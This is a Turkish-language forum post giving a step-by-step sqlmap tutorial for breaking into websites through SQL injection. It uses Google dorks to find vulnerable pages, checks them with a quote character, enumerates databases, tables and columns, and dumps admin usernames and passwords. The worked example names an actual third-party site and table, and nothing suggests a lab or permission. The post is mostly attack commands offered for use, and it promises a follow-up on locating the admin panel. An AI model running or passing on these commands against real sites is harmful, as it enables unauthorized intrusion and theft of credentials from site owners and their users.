Hoşgeldin Misafir

SQLMAP İLE SİTE AÇIĞI NASIL BULUNUR

Asım Gürsoy

mersin
27 Mar 2020
8,833 Mesaj

Aktiflik

Seviye

Deneyim

TIM / GÖREV:
SQLMAP-
  • Kali linux uygulamalardan Exploit Tool bölümünden sqlmap i seçiyoruz
  • İlk önce sqlmapte bir dork taraması yapalım.
  • Kod:
    sqlmap -g inurl:"newspage.php?="


  • Bize bu dorka uygun siteleri taradı ve 67 site buldu verilen linklere sağtık yapıp bağlantıyı açınız ve bulunan açığın sonuna (') bu işareti koyup gerçekten varmı yokmu kontrol ediniz.



  • Olmayan sitelere resimde görüldüğü gibi n yazıp geçebilirsiniz.
  • Evet şimdi açıklı bir siteyi bulduk bununla admin bilgilerini bulacağız yeni bir sqlmap açıyoruz uygulamalardan.
  • Kod:
    sqlmap -u hedefsite açığı --dbs
    sondaki -- dbs databes çekmek içindir

  • İlk gelen beyazlı kısma yes diyoruz ve devam ediyor.

  • İkinci gelen kısma yes yani riskli yazan ikinci kısma no diyoruz sonraki gelen kısma tekrar yes diyoruz.

  • Resimde görüdüğü üzere databesleri çekti information shema yazan her sitede olur bize admin panelinin olduğu tablo lazım olduğu için onu yazıyoruz.
  • Kod:
    sqlmap -u http://www.emilcap.it/newspage.php?id=17 multiweb --tables

    sqlmap -u site açığı tablo ismi --tables


  • Bize o databeste bulunan tabloları çekti gördüğünüz gibi şimdi admin user username gibi bölümlere ulaşabileceğimiz kolumları çekicez.
  • Kod:
    sqlmap -u http://www.emilcap.it/newspage.php?id=17 -D multi_web -T sitiLogin --columns

    sqlmap -u Site açığı -D bulunduğu tablo -T çekeceğiniz kolon--columns


  • Gördüğünüz üzere geldi ve şimdi göstemesini istediğiniz bölümleri çekicez.
  • Kod:
    sqlmap -u http://www.emilcap.it/newspage.php?id=17 -D multi_web -T sitiLogin -C user,password --dump

    sqlmap -u site açığı -D bunuduğu tablo -T bulunduğu kolon -C ve admin paneli bilgilerinin olduğu bölümler --dump
    sondaki dump ta göster demek.


  • Gördüğünüz üzere admin ve şifreler ortaya çıktı.
  • Site Admin panelini bulmaya geldi şimdi iş bunun içinse takipte kalınız